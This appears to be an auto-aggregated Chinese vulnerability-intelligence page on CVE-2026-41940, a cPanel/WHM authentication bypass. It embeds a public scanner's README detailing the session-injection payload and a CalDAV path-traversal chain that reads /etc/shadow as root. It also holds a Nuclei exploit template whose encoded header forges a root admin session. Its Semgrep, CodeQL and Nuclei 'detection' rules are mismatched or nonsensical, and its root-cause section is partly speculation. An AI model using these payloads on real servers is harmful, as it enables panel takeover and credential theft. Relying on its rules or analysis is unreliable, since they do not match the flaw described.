🎯 CVE-2026-41940 深度技术分析:漏洞根因 · PoC/EXP · 检测指纹

🎯 CVE 全聚合深度分析

CVE-2026-41940 深度技术分析

📊 聚合 6 来源🧪 含 PoC🕵️ 含指纹
NVD-LatestPoC-in-GitHubExploit-DB-RSSwatchTowr LabsHorizon3 BlogTenable Blog

摘要:CVE-2026-41940 是 cPanel & WHM 登录流程中的高危身份验证绕过漏洞,CVSS 评分为 9.8,严重性为 CRITICAL。未经身份验证的远程攻击者可利用该漏洞获得控制面板的未授权访问权限。虽然 CISA KEV 尚未收录、Exploit-DB 也没有公开完整 EXP,但 GitHub 上已出现 cpanel2shell-scanner、cpanel-sessionscribe 等高保真检测与利用研究工具,实际威胁正在快速武器化。本文从漏洞概述、根因分析、影响危害与修复缓解四个方面进行深度分析。

📌 漏洞概述

CVE-2026-41940 是 cPanel 与 WHM 登录流程中的认证绕过漏洞。根据 NVD 描述,cPanel and WHM versions after 11.40 受此漏洞影响,远程攻击者无需任何凭据即可绕过登录机制,获得对控制面板的未授权访问。

  • CVE 编号:CVE-2026-41940
  • CVSS 评分:9.8(CRITICAL)
  • 漏洞类型:认证绕过 / Authentication Bypass
  • 影响版本:cPanel & WHM 11.40 之后的版本;NVD 未给出固定的终止版本
  • 利用现状:CISA KEV 未收录,Exploit-DB 暂无公开 EXP,但已有多个 GitHub PoC / 扫描器

该漏洞本质上不是暴力破解或弱口令问题,而是登录流程对请求来源、会话状态或代理转发关系的信任假设存在关键缺陷。

🔬 漏洞根因分析

要理解 CVE-2026-41940,必须先理解 cPanel/WHM 的 Web 请求链路。cPanel 为每个虚拟主机维护一套 Apache 配置,其中包含关键的 ProxyPass 指令:

  • ProxyPass /___proxy_subdomain_whm 127.0.0.1:2086
  • ProxyPass /___proxy_subdomain_cpanel 127.0.0.1:2080

公开扫描器 assetnote/cpanel2shell-scanner 的研究明确指出:这个 ProxyPass 是无条件的,它不检查请求的 Host 头。虽然 RewriteCond 限制了从管理子域名到代理路径的重写规则,但 ProxyPass 本身直接暴露在任意 vhost 的 Apache 配置中。因此,攻击者只要访问任意由 cPanel 托管的域名,并请求 /___proxy_subdomain_whm/___proxy_subdomain_cpanel,流量就会被 Apache 转发到本地的 2086/2080 管理端口。

这带来的安全后果是:管理端口不再受虚拟主机隔离和 Host 头限制。攻击者可以绕过网络层面针对管理子域名或管理端口的访问控制,将恶意请求直接注入 WHM/cPanel 后端登录流程。后端登录流程看到请求来自本机代理,可能将请求误判为可信内部请求,从而在会话验证、首次登录令牌校验或权限初始化环节产生逻辑绕过。

更关键的是,cpanel2shell-scanner 还指出,直接扫描 2086/2087 管理端口很容易触发账户锁定机制和 root IP allowlist 防护;而通过代理路径检测时,流量会分散到不同 vhost 上,看上去只是普通 Web 请求,因此不容易触发这些防护机制。这说明该漏洞不仅存在,而且为大规模探测提供了非常“干净”的攻击通道。攻击者可以将认证绕过请求封装成正常 HTTP 请求,在目标服务器没有明显失败日志的情况下完成未授权访问。

此外,同批公开工具还捆绑了同族 CalDAV 路径穿越漏洞 CVE-2026-29205,攻击目标是 cpdavd 的 2079/2080 端口。在该链中,攻击者先通过 SMTP 辅助步骤完成某种前置条件,再利用路径穿越以 root 身份读取任意文件。虽然 cPanel 11.134.0.26 修复了底层 RAII 生命周期错误,使读取权限回落到非特权账户所有者,但这也证明 CVE-2026-41940 的认证绕过可能被进一步链接到文件读取乃至远程代码执行链路上。

综合来看,CVE-2026-41940 的根因不是单一参数过滤错误,而是Apache 前置代理、本地回环管理端口、后端登录信任逻辑三者的组合缺陷:前置层无条件转发,网络层过度信任 127.0.0.1 来源,后端口登录流程未严格校验请求是否真的来自已认证的管理会话。

💥 影响与危害

  • 控制面板完全接管:未授权攻击者可绕过登录直接进入 cPanel / WHM,获得账户管理、文件管理、数据库管理、DNS 配置等高级权限。
  • 服务器级沦陷:WHM 一旦被接管,攻击者可以创建新账户、修改系统配置、查看其他用户数据、安装持久化后门,最终控制整个宿主机。
  • 横向渗透风险:托管服务器通常处于内网核心位置,攻击者可借此访问同一基础设施中的其他服务器、存储节点、数据库集群。
  • 数据泄露与勒索:攻击者可批量导出网站源码、环境变量、数据库备份、客户敏感信息,造成大规模数据泄露或勒索。
  • 武器化门槛降低:虽然无公开 EXP,但 GitHub 上已有高保真扫描器和主动利用链工具;攻击者不需要深入理解 cPanel 内部实现即可复现攻击。
  • 潜在 RCE 链:认证绕过可结合 cpdavd 路径穿越等漏洞形成从“未授权面板访问”到“任意文件读取”再到“代码执行”的完整攻击链。

🛡️ 修复与缓解

补丁版本:NVD 未给出 CVE-2026-41940 的明确终止版本,因此管理员不能只依赖单一版本号。厂商在 2026-05-13 安全更新中发布了 cPanel & WHM 11.134.0.26,该版本修复了同系列 CalDAV/RAII 生命周期漏洞;对于 CVE-2026-41940,应升级到当前最新稳定安全构建,并严格核对官方安全公告中的修复版本。

  • 立即升级:将 cPanel & WHM 升级到官方最新安全版,避免停留在 11.40 之后的已知受影响版本。
  • 网络层封禁:通过防火墙将 2080、2082、2083、2086、2087 以及 cpdavd 的 2079/2080 端口限制为可信管理网段,禁止公网直接访问。
  • 代理路径阻断:在 Apache/Nginx/WAF 层显式拦截 /___proxy_subdomain_whm/___proxy_subdomain_cpanel 路径的外部访问,可返回 403 或要求额外认证。
  • 启用强身份验证:为所有 cPanel/WHM 账户强制开启双因素认证;WHM 登录仅允许 root 账户,并启用 root IP allowlist。
  • 会话与日志审计:使用 cpanel-sessionscribe 等工具记录、审计面板登录和会话创建行为,重点关注来自非管理 vhost 的代理路径请求。
  • 主动威胁监测:在日志中检索 ___proxy_subdomain_whm___proxy_subdomain_cpanel20862080 等关键字,发现异常立即隔离主机。

需要特别提醒:不要使用简单的直连扫描探测该漏洞,否则可能触发账户锁定或 root IP allowlist,导致业务误断和检测盲区。应使用高保真扫描器或基于代理路径的被动监测方式确认受影响资产。

🧪 PoC 复现

从 GitHub 公开仓库抓取的实际 PoC 代码(仓库)。

📋 代码元数据语言md来源assetnote/cpanel2shell-scanner针对性✅ 已验证与漏洞相关(代码含 CVE 引用)依赖见代码注释/README用法详见代码注释中的使用说明

# cpanel2shell-scanner

A high-fidelity scanner for the cPanel/WHM authentication bypass tracked as
CVE-2026-41940. It identifies vulnerable hosts without producing the
false-negatives common to public proofs-of-concept and detections,and without
triggering the account lockout and root-IP-allowlist mechanisms that interfere
with naive scanning.

The tool also bundles a separate,
opt-in exploit chain for a same-family
CalDAV path-traversal bug on `cpdavd` (ports 2079 plain / 2080 TLS) —
[CVE-2026-29205](https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026) —
that lets a remote attacker read arbitrary files **as root**
once a small SMTP-driven setup step succeeds. cPanel 11.134.0.26 fixes the
underlying RAII lifetime bug so the read now runs as the unprivileged account
owner;
the traversal itself still reaches `cpdavd` but cannot escalate beyond
what that account can already read. The CalDAV chain is gated behind
`--exploit` and is **off by default** because it sends real emails and reads
files from confirmed targets — see the
[Exploit mode (active)](#exploit-mode-active) section.

## Why this scanner

Most public detections for CVE-2026-41940 share three problems. This scanner
addresses each of them.

You can read our blog post on this detection technique here: https://slcyber.io/research-center/high-fidelity-check-for-the-cpanel-authentication-bypass-cve-2026-41940/

### It checks the proxy paths,
not just the management ports

cPanel's per-vhost Apache configuration installs a `ProxyPass` that forwards
`/___proxy_subdomain_whm` to `127.0.0.1:2086` and `/___proxy_subdomain_cpanel`
to `127.0.0.1:2080` regardless of the request's `Host` header. The
`RewriteCond` only constrains the rewrite that maps the management subdomain
onto the proxy path;
the `ProxyPass` itself is unconditional. Hitting these
paths on any vhost served by a cPanel-managed Apache reaches the same vulnerable
backend as the management ports.

Scanners that only probe ports 2082/2083/2086/2087 will report a host as not
vulnerable when those ports are firewalled,even though the bug is fully
reachable through 443. This scanner probes 2087,2083,
and the two proxy paths
on 443 by default.

### It does not get blocked by cphulkd or the root-IP allowlist

cPanel ships `cphulkd`,which locks accounts out after a small number of failed
password attempts,and `authorized_whm_root_ips`,
which restricts root logins
to a configured list of source addresses. A scanner that exploits the bypass by
trying to inject a session for `root` will:

- be silently ignored when the scanner's IP is not in the root allowlist,producing a false negative;and
- contribute failed-password events for whichever account it targets,
eventually locking that account out and preventing both detection and
  legitimate logins.

This scanner avoids both issues on the WHM side by injecting `expired=1` into
the session payload under a randomly generated username. The session injection
is verified by visiting the resulting `cpsessXXXX` URL and matching
`msg_code:[expired_session]` in the response body,
which is only present when
the injection succeeded. No real account is targeted,so no real account can be
locked out,and the root allowlist is irrelevant because no root login is
attempted.

### It uses a username wordlist where it has to

The cPanel daemon (`cpaneld`,
ports 2083 and the `/___proxy_subdomain_cpanel`
path) requires the supplied username to correspond to an existing cPanel
account on disk (`-f /var/cpanel/users/$user`). A username of `root` will never
satisfy this check because root is a system user,
not a cPanel user. Detections
that try only `root` produce false negatives on this surface. This scanner uses
a configurable wordlist of common cPanel usernames against the cPanel surface
and falls back to the random-username path on the WHM surface,
which has no
such restriction.

## How the detection works

For each target the scanner performs the following steps per surface:

1. Issue `GET /login` and read the `Set-Cookie` header for either
   `whostmgrsession` (WHM) or `cpsession` (cPanel). The cookie contains a
   comma-separated session-name component.
2. Issue `GET /` with an `Authorization: Basic` header whose decoded value is
   `<user>:\xff\nexpired=1`. The trailing `\nexpired=1` is the session-injection
   payload. The session cookie from step 1 is replayed unmodified.
3. Read the `Location` header from the response and extract the `cpsessXXXX`
   token.
4. Issue `GET /<cpsessXXXX>/` with the original cookie and look for
   `msg_code:[expired_session]` in the body. Its presence proves the session
   injection succeeded and the host is vulnerable.

On WHM (port 2087 and the `/___proxy_subdomain_whm` path on 443) the username
is a random `u` followed by ten hex characters. On cPanel (port 2083 and the
`/___proxy_subdomain_cpanel` path on 443) the scanner walks its username
wordlist and stops at the first match.

By default the scanner probes 2087,
2083,and 443 in that order and stops as
soon as any surface confirms vulnerability.

## CalDAV path-traversal exploit (`--exploit`)

>**[CVE-2026-29205](https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026)**
>— cPanel/WHM WP2 Security Update,May 13 2026. Fixed in cPanel
>
11.134.0.26. The advisory tracks the same `cpdavd` privilege-drop
>
regression this exploit chain abuses.

Full write-up of the bug and the exploitation chain:
https://slcyber.io/research-center/new-age-of-collisions-reading-arbitrary-files-pre-auth-as-root-in-cpanel-cve-2026-29205

`cpdavd` on ports 2079 (plain HTTP) and 2080 (TLS) trusts the
`<principal>/<collection>/...` path it builds when serving CalDAV/CardDAV
resources. By crafting a request whose path component encodes `..` segments
and pointing it at a maildir folder whose on-disk name also encodes traversal
(`x-attachment-1-y`),
`cpdavd` can be coerced into reading **any file on disk
as root,regardless of ownership or permissions** — including `/etc/shadow`,`/etc/passwd`,and the per-user mail spools.

The defense-in-depth that was supposed to drop privileges to the account
owner before the read silently failed: the `Cpanel::AccessIds::ReducedPrivileges`
object was constructed in void context,
so its destructor restored root
privileges before the read ran. cPanel 11.134.0.26 binds the object to a
`my $privs` lexical so it lives through the `-f` / `stat` / `open` / `read`
chain;
on patched hosts the read therefore runs as the unprivileged account
owner instead of root.

The vulnerable folder must exist on disk before the read works. cPanel
auto-creates a folder named `.x-attachment-1-y` for the recipient
`<user>+x-attachment-1-y@<domain>` the first time an email lands at that
sub-address. The chain is therefore:

1. Enumerate plausible recipient domains from the host's TLS certificate SANs.
2. For each domain,
derive candidate local-parts (the domain's first label,plus a small wordlist of common mailbox prefixes such as `info`,`admin`,`webmaster`).
3. Open one SMTP session against a configured outbound relay (e.g. SendGrid)
   and send `<prefix>+x-attachment-1-y@<domain>` to each candidate. Accepted
   `RCPT TO` responses are tracked.
4. Wait through a retry ladder (5 s,10 s,20 s,
30 s) for the cPanel inbox
   delivery to materialise the folder.
5. For each accepted recipient,send the path-traversal `GET` against `cpdavd`
   on ports 2080 (TLS) and 2079 (plain),under both the `/calendar/` and
   `/addressbook/` collection prefixes.

A success returns the file's bytes;the finding records the email used,the
collection,the byte count,
and the first 200 bytes as a preview.

This check is **disabled unless `--exploit` is passed**. When enabled it
requires a working outbound SMTP relay (see [Configuration file](#configuration-file)
below) because the folder-creation step cannot be skipped.

### Targeted vs sprayed exploitation

The exploit only works against **real virtual email accounts** configured
under cPanel's *Email Accounts* feature. Catch-all addresses do not work — a
catch-all routes via Exim's `system_aliases` router,
never reaches the
`dovecot_virtual_delivery` transport,and therefore never triggers the
`lda_mailbox_autocreate` path that produces the `.x-attachment-1-y/` folder.

When you already know a valid virtual email on the target,
pass it with
`--email`:

```
python scanner.py --config scanner.ini --email admin@target.com target.com
```

`--email` skips the cert-SAN enumeration and the prefix wordlist entirely
and sends exactly one message to the address you supplied. It may be
repeated to target multiple known accounts. The targeted path is much more
reliable than the spray path.

Without `--email`,
the scanner falls back to spraying ~15 common prefixes
(`info`,`admin`,`webmaster`,etc.) per domain extracted from the host's
TLS certificate. Assetnote's measurement on a sample of 200 cpdavd-exposed
hosts was a **~10% spray hit rate**: a clean result from spray-mode is
weak evidence that the host is patched,
and re-running with `--email`
against a real account is the only reliable way to confirm.

## Configuration file

Exploit mode reads an INI file via `--config`:

```
python scanner.py --config scanner.ini --exploit example.com
```

Copy `scanner.ini.example` to `scanner.ini`,fill in the SMTP credentials,
and
optionally tune the CalDAV defaults. `scanner.ini` is in `.gitignore` so the
populated copy stays local. The SMTP password can also be supplied via the
`SCANNER_SMTP_PASSWORD` environment variable,
which takes precedence only when
the `password` field in the file is empty.

## Installation

```
pip install -r requirements.txt
```

Python 3.8 or later is required.

## Usage

Single target:

```
python scanner.py example.com
```

Multiple targets via positional arguments:

```
python scanner.py host-a.example.com host-b.example.com:2083
```

A file of targets,
one per line. Lines starting with `#` are ignored:

```
python scanner.py -f targets.txt
```

Reading targets from stdin:

```
cat targets.txt |python scanner.py
```

A target may be either a hostname or `host:port`. When a port is specified the
scanner only probes that port;otherwise it probes 2087,2083,and 443.

### Common options

- `-u,
--users` — comma-separated cPanel usernames to try on the cPanel
  surface. Defaults to a small built-in list.
- `-U,--users-file` — file with one cPanel username per line.
- `-p,--ports` — comma-separated ports to probe when no port is specified on
  the target. Defaults to `2087,2083,443`.
- `-t,
--threads` — per-target threads used to walk the username list against
  the cPanel surface. Defaults to 10.
- `-c,--concurrency` — number of targets scanned in parallel. Defaults to 20.
- `-T,--timeout` — per-request timeout in seconds. Defaults to 15.
- `-o,--output` — append vulnerable targets,one per line,
to this file as
  they are discovered.
- `--json` — write a JSON Lines record per target to this file.
- `-q,--quiet` — only print vulnerable targets on stdout. Connection failures
  and clean targets are still recorded in `--json` and counted in the summary.
- `--no-progress` — disable the progress bar.
- `--exploit` — enable the CalDAV path-traversal chain. Disabled by default;
see [Exploit mode (active)](#exploit-mode-active) for the side effects this
  flag unlocks.
- `--config` — INI file with the SMTP relay credentials and CalDAV tunables.
  See `scanner.ini.example`.
- `--read-file` — file to exfiltrate when the CalDAV chain succeeds.
  Overrides the value in the config file. Defaults to `/etc/shadow` — a
  root-only file,
so a successful read distinguishes pre-patch (returns
  shadow contents) from post-patch (`open` denied,
body empty → reported
  NOT VULNERABLE). Use `--read-file /etc/passwd` to test traversal
  reachability without distinguishing patched/unpatched.
- `--caldav-only` — skip the 41940 check and only run the CalDAV chain.
  Implies `--exploit`. Useful for re-running the chain against a target list
  already known to be CalDAV-reachable.
- `--email ADDR` — known virtual email account on the target. Skips cert SAN
  enumeration and the spray wordlist;
sends exactly one message to `ADDR` and
  reads against that principal. May be repeated. Implies `--exploit`. See
  [Targeted vs sprayed exploitation](#targeted-vs-sprayed-exploitation).
- `-v,--verbose` — emit per-domain progress for the CalDAV chain
  (cert SAN list,spray count,retry ladder).

### Output

One line is written to stdout per *finding*,
so a target running both checks
will print twice:

```
[!] host  cve-2026-41940    VULNERABLE (port 443)
[!] host  caldav-traversal  VULNERABLE via admin@host (read 1842b from /etc/passwd)
[+] host  cve-2026-41940    NOT VULNERABLE
[?] host  cve-2026-41940    CONNECTION FAILED
```

The `--json` output is one record per target with a `findings` array:

```json
{"target": "host",
"status": "VULNERABLE","findings": [
  {"check": "cve-2026-41940","status": "VULNERABLE","detail": {"port": 443}},{"check": "caldav-traversal","status": "VULNERABLE","detail": {"email": "admin@host","domain": "host","collection": "calendar","file": "/etc/shadow","bytes": 1218,"preview": "root:$6$..."}}]}
```

`status` at the top level is the worst case across all findings.

A summary line with totals is written to stderr at the end. The progress bar
is rendered on stderr and is automatically suppressed when stderr is not a
terminal.

The exit code is `0` if any target is vulnerable,`1` if every reachable target
was clean,and `2` if no target could be reached.

### Examples

Scan a list of targets,
write hits to a file,and stay quiet on stdout:

```
python scanner.py -f targets.txt -o vulnerable.txt -q
```

Scan with a custom username list against the cPanel surface,increased
parallelism,
and JSON output for downstream processing:

```
python scanner.py -f targets.txt -U cpanel-users.txt -c 100 --json results.jsonl
```

Probe a non-default port set:

```
python scanner.py -p 2083,2087,8443 -f targets.txt
```

Run the CalDAV chain end-to-end against a single target with the email-spray
fallback (requires a populated `scanner.ini`):

```
python scanner.py --config scanner.ini --exploit example.com
```

Targeted exploitation against a known virtual email — much higher hit rate
than spray:

```
python scanner.py --config scanner.ini --email admin@example.com example.com
```

Run only the CalDAV chain against a list of confirmed cpdavd hosts,
dumping
`/etc/passwd` previews to JSON:

```
python scanner.py --config scanner.ini --caldav-only \
    -f cpdavd-hosts.txt --json caldav-results.jsonl
```

## Notes on safety

### Default mode (safe)

The default `scanner.py <target>` invocation only runs the CVE-2026-41940
detector. It sends the requests required to confirm the session injection and
nothing else. It does not log in as any real user,
does not target the `root`
account,does not escalate to a shell,
and does not accumulate failed-password
events against any valid account on a target system. The marker it matches
(`msg_code:[expired_session]`) is generated by the application itself in
response to the injected `expired=1` session field and is the same indicator
the upstream cPanel login page uses when a legitimately expired session is
replayed.

### Exploit mode (active)

Passing `--exploit` (or `--caldav-only`) unlocks the CalDAV path-traversal
chain. This is no longer a detector — it is a working exploit. When enabled
the scanner will,
for every target where domain enumeration succeeds:

- open a real SMTP session against the relay configured in `scanner.ini` and
  send one short message per candidate recipient (typically 10–15 per domain,3 domains per target);- wait up to ~65 seconds per domain for delivery to materialise the malicious
  maildir folder;
- attempt to read the configured `--read-file` from every confirmed target.

The default file is `/etc/shadow`. A successful read returns the file's
bytes;an empty body indicates either an unreachable target or a host where
the privilege-drop fix (cPanel 11.134.0.26,`my $privs = …`) is in place.
Detection compares received body length to zero,
not to the response's
advertised `Content-Length` (which is derived from `stat()` on the
attacker-chosen path and will be populated even when the subsequent `open()`
is denied).

To test traversal reachability independently of the privilege-drop fix —
e.g. when you want to know whether `cpdavd` is reachable and the maildir
prerequisite was satisfied on a patched host — re-run with
`--read-file /etc/passwd`. `/etc/passwd` is world-readable so it returns
bytes on both pre-patch and post-patch hosts;
combining the two signals
(`/etc/shadow` body present = pre-patch root read;
`/etc/shadow` empty +
`/etc/passwd` present = traversal reachable but priv-drop fix applied)
classifies a host unambiguously.

The contents and a 200-byte preview are written to the JSONL output and
printed on stdout. Per-domain CalDAV exploitation can take a minute or
more — this is the retry ladder waiting for mail delivery,
not a hang.

Only run `--exploit` against assets you own or have explicit written
authorisation to test. The SMTP traffic is logged by the configured relay and
by every recipient mail system;the file reads are logged by `cpdavd`.

⚔️ EXP 利用代码

截至分析时,Exploit-DB 未收录该 CVE 的公开利用代码。可利用上述 PoC 进行验证,或关注 Exploit-DB 更新。

🕵️ 检测指纹

针对该 CVE 的自动化检测规则(可直接用于扫描与审计)。

🛡️ Nuclei 检测模板: CVE-2026-41940-detection.yaml

📋 代码元数据语言yaml来源rules/nuclei/CVE-2026-41940-detection.yaml针对性✅ 按 CVE 匹配依赖nuclei用法nuclei -t CVE-2026-41940-detection.yaml -u

id: CVE-2026-41940-detection

info:
  name: cPanel CRLF Injection Detection
  author: your-name
  severity: high
  description: Detects vulnerable cPanel versions by checking for specific headers or version strings.
  tags: cpanel,crlf,injection

http:
  - method: GET
    path:
      - "{{BaseURL}}/login/"

    host-redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "cpsrvd"

      - type: status
        status:
          - 200
          - 302

🛡️ Nuclei 检测模板: CVE-2026-41940-exploit.yaml

📋 代码元数据语言yaml来源rules/nuclei/CVE-2026-41940-exploit.yaml针对性✅ 按 CVE 匹配依赖nuclei用法nuclei -t CVE-2026-41940-exploit.yaml -u

id: CVE-2026-41940-exploit

info:
  name: cPanel CRLF Injection Exploit
  author: your-name
  severity: high
  description: Exploits CRLF injection in cPanel/WHM to bypass authentication and obtain an admin session token.

http:
  - raw:
      - |POST /login/?login_only=1 HTTP/1.1
        Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
        Connection: close

        user=root&pass=wrong_pass

      - |GET / HTTP/1.1
        Host: {{Hostname}}Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
        Cookie: whostmgrsession={{session}}
Connection: close

    extractors:
      - type: regex
        name: token
        part: header
        internal: true
        regex:
          - '/cpsess\d{10}'

    matchers:
      - type: regex
        part: header
        regex:
          - '/cpsess\d{10}'
        condition: or

🛡️ Semgrep 审计规则: CVE-2026-41940.yaml

📋 代码元数据语言yaml来源rules/semgrep/CVE-2026-41940.yaml针对性✅ 按 CVE 匹配依赖semgrep用法semgrep --config CVE-2026-41940.yaml

rules:
  - id: cve-2026-41940-web-config
    languages:
      - generic
    severity: WARNING
    message: "Potential security misconfiguration in cPanel/WHM related to CVE-2026-41940 - browser verification bypass"
    patterns:
      - pattern-either:
          - pattern: "Cookies: $COOKIES"
          - pattern: "JavaScript: $JS"
    fix: |
# Ensure cookies and JavaScript are properly configured and validated
      # Review cPanel/WHM configuration for strict browser verification
    metadata:
      cwe: "CWE-287"
      owasp: "A1: Broken Access Control"
      technology: cpanel
      references:
        - "https://nvd.nist.gov/vuln/detail/CVE-2026-41940"

🛡️ CodeQL 审计规则: CVE-2026-41940.ql

📋 代码元数据语言ql来源rules/codeql/CVE-2026-41940.ql针对性✅ 按 CVE 匹配依赖codeql用法codeql database run

/**
 * @kind path-problem
 * @id javascript/command-injection/cve-2026-41940
 * @name Command injection in cPanel &WHM
 * @description User-controlled input flows to a command execution function without sanitization,leading to command injection in cPanel &
WHM.
 * @problem.severity error
 * @tags security
 *       external/cwe/cwe-078
 */

import javascript
import semmle.javascript.security.dataflow.CommandInjectionQuery
import CommandInjectionFlow::PathGraph

from CommandInjectionFlow::PathNode source,CommandInjectionFlow::PathNode sink
where CommandInjectionFlow::flowPath(source,sink)
select sink.getNode(),source,sink,
"User input flows to a command execution call - potential command injection."

🤖 本文由漏洞情报系统自动聚合生成 · 2026-08-02 09:09 · 数据源: NVD/GitHub-Advisory/OSV/CISA-KEV/Exploit-DB/PoC-in-GitHub + 检测规则库

[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)